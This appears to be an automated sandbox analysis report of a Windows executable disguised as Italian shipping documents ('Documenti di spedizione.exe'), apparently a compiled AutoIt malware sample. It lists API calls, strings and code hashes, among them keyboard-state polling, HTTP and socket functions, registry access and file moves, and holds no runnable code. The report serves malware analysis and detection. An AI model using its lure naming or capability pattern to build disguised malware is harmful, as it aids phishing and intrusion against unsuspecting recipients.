                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                        APIs
                          • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                          • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                        • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                        • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                        • ImageList_EndDrag.COMCTL32 ref: 00471169
                        • ReleaseCapture.USER32 ref: 0047116F
                        • SetWindowTextW.USER32(?,00000000), ref: 00471206
                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                        Strings
                        Similarity
                        • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                        APIs
                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                        • _wcslen.LIBCMT ref: 00450720
                        • _wcscat.LIBCMT ref: 00450733
                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                        • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                        Strings
                        Similarity
                        • API ID: MessageSend$Window_wcscat_wcslen
                        • String ID: -----$SysListView32
                        APIs
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                        • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                        • GetParent.USER32 ref: 00469C98
                        • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                        • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                        • GetParent.USER32 ref: 00469CBC
                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                        Strings
                        Similarity
                        • API ID: MessageSend$CtrlParent$_memmove_wcslen
                        • String ID: ComboBox$ListBox
                        APIs
                        Similarity
                        • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                        • String ID:
                        APIs
                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                        • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                        • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                        • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                        • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                        • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                        Similarity
                        • API ID: MessageSend$LongWindow
                        • String ID:
                        • API String ID: 312131281-0
                        • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                        • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                        • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                        • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                        APIs
                          • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                        • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                        • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                          • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: MessageSend$BrushCreateDeleteObjectSolid
                        • String ID:
                        • API String ID: 3771399671-0
                        • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                        • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                        • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                        • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 00434643
                        • GetForegroundWindow.USER32(00000000), ref: 00434655
                        • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                        • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                        • String ID:
                        • API String ID: 2156557900-0
                        • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                        • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                        • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                        • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                        • API String ID: 0-1603158881
                        • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                        • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                        • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                        • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                        APIs
                        • CreateMenu.USER32 ref: 00448603
                        • SetMenu.USER32(?,00000000), ref: 00448613
                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                        • IsMenu.USER32(?), ref: 004486AB
                        • CreatePopupMenu.USER32 ref: 004486B5
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                        • DrawMenuBar.USER32 ref: 004486F5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                        • String ID: 0
                        • API String ID: 161812096-4108050209
                        • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                        • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                        • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                        • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe), ref: 00434057
                        • LoadStringW.USER32(00000000), ref: 00434060
                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                        • LoadStringW.USER32(00000000), ref: 00434078
                        • _wprintf.LIBCMT ref: 004340A1
                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                        Strings
                        • C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, xrefs: 00434040
                        • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: HandleLoadModuleString$Message_wprintf
                        • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe
                        • API String ID: 3648134473-2789728585
                        • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                        • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                        • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                        • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                        • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                        • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                        • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                        APIs
                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,0040F545,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,004A90E8,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,?,0040F545), ref: 0041013C
                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                        • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                        • MoveFileW.KERNEL32(?,?), ref: 00453932
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: File$AttributesFullMoveNamePathlstrcmpi
                        • String ID:
                        • API String ID: 978794511-0
                        • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                        • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                        • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                        • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                        • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                        • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                        • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: ClearVariant
                        • String ID:
                        • API String ID: 1473721057-0
                        • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                        • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                        • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                        • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: _memmove$_memcmp
                        • String ID: '$\$h
                        • API String ID: 2205784470-1303700344
                        • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                        • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                        • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                        • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                        APIs
                        • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                        • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                        • VariantClear.OLEAUT32 ref: 0045EA6D
                        • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                        • __swprintf.LIBCMT ref: 0045EC33
                        • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                        Strings
                        • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: Variant$InitTime$ClearCopySystem__swprintf
                        • String ID: %4d%02d%02d%02d%02d%02d
                        • API String ID: 2441338619-1568723262
                        • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                        • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                        • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                        • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                        APIs
                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                        • Sleep.KERNEL32(0000000A), ref: 0042C67F
                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: Interlocked$DecrementIncrement$Sleep
                        • String ID: @COM_EVENTOBJ
                        • API String ID: 327565842-2228938565
                        • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                        • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                        • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                        • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                        APIs
                        • VariantClear.OLEAUT32(?), ref: 0047031B
                        • VariantClear.OLEAUT32(?), ref: 0047044F
                        • VariantInit.OLEAUT32(?), ref: 004704A3
                        • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                        • VariantClear.OLEAUT32(?), ref: 00470516
                          • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                        • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                          • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                        • VariantClear.OLEAUT32(00000000), ref: 0047060D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: Variant$Clear$Copy$CallDispFuncInit
                        • String ID: H
                        • API String ID: 3613100350-2852464175
                        • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                        • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                        • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                        • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                        APIs
                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                        • DestroyWindow.USER32(?), ref: 00426F50
                        • UnregisterHotKey.USER32(?), ref: 00426F77
                        • FreeLibrary.KERNEL32(?), ref: 0042701F
                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                        • String ID: close all
                        • API String ID: 4174999648-3243417748
                        APIs
                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                        • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                        Similarity
                        • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                        • String ID:
                        • API String ID: 1291720006-3916222277
                        APIs
                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                        • IsMenu.USER32(?), ref: 0045FC5F
                        • CreatePopupMenu.USER32 ref: 0045FC97
                        • GetMenuItemCount.USER32(?), ref: 0045FCFD
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                        Similarity
                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                        • String ID: 0$2
                        • API String ID: 93392585-3793063076
                        APIs
                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                        • VariantClear.OLEAUT32(?), ref: 00435320
                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                        • VariantClear.OLEAUT32(?), ref: 004353B3
                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                        Similarity
                        • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                        • String ID: crts
                        • API String ID: 586820018-3724388283
                        APIs
                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,0040F545,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,004A90E8,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,?,0040F545), ref: 0041013C
                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                        • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                        • _wcscat.LIBCMT ref: 0044BCAF
                        • _wcslen.LIBCMT ref: 0044BCBB
                        • _wcslen.LIBCMT ref: 0044BCD1
                        • SHFileOperationW.SHELL32(?), ref: 0044BD17
                        Similarity
                        • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                        • String ID: \*.*
                        • API String ID: 2326526234-1173974218
                        APIs
                          • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                        • _wcslen.LIBCMT ref: 004335F2
                        • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                        • GetLastError.KERNEL32 ref: 0043362B
                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                        • _wcsrchr.LIBCMT ref: 00433666
                          • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                        Similarity
                        • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                        • String ID: \
                        • API String ID: 321622961-2967466578
                        APIs
                        Similarity
                        • API ID: __wcsnicmp
                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                        • API String ID: 1038674560-2734436370
                        APIs
                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                        • __lock.LIBCMT ref: 00417981
                          • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                          • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                          • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                        • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                        • __lock.LIBCMT ref: 004179A2
                        • ___addlocaleref.LIBCMT ref: 004179C0
                        Similarity
                        • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                        • String ID: KERNEL32.DLL$pI
                        • API String ID: 637971194-197072765
                        APIs
                        Similarity
                        • API ID: _memmove$_malloc
                        • String ID:
                        • API String ID: 1938898002-0
                        APIs
                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                        • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                        • _memmove.LIBCMT ref: 0044B555
                        • _memmove.LIBCMT ref: 0044B578
                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                        Similarity
                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                        • String ID:
                        • API String ID: 2737351978-0
                        APIs
                        • ___set_flsgetvalue.LIBCMT ref: 0041523A
                        • __calloc_crt.LIBCMT ref: 00415246
                        • __getptd.LIBCMT ref: 00415253
                        • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                        • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                        • _free.LIBCMT ref: 0041529E
                        • __dosmaperr.LIBCMT ref: 004152A9
                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                        Similarity
                        • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                        • String ID:
                        • API String ID: 3638380555-0
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 0046C96E
                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                        Similarity
                        • API ID: Variant$Copy$ClearErrorInitLast
                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                        • API String ID: 3207048006-625585964
                        APIs
                        • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                        • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                        • gethostbyname.WSOCK32(?), ref: 004655A6
                        • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                        • _memmove.LIBCMT ref: 004656CA
                        • GlobalFree.KERNEL32(00000000), ref: 0046575C
                        • WSACleanup.WSOCK32 ref: 00465762
                        Similarity
                        • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                        • String ID:
                        • API String ID: 2945290962-0
                        APIs
                        • GetSystemMetrics.USER32(0000000F), ref: 00440527
                        • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                        • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                        • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                        Similarity
                        • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                        • String ID:
                        • API String ID: 1457242333-0
                        APIs
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                        Similarity
                        • API ID: ConnectRegistry_memmove_wcslen
                        • String ID:
                        • API String ID: 15295421-0
                        APIs
                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                        • _wcstok.LIBCMT ref: 004675B2
                          • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                        • _wcscpy.LIBCMT ref: 00467641
                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                        • _wcslen.LIBCMT ref: 00467793
                        • _wcslen.LIBCMT ref: 004677BD
                          • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                        Similarity
                        • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                        • String ID: X
                        • API String ID: 780548581-3081909835
                        APIs
                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                        • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                        • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                        • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                        • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                        • CloseFigure.GDI32(?), ref: 0044751F
                        • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                        • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                        Similarity
                        • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                        • String ID:
                        • API String ID: 4082120231-0
                        APIs
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                        • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                        • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                        Similarity
                        • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                        • String ID:
                        • API String ID: 2027346449-0
                        APIs
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                        • GetMenu.USER32 ref: 0047A703
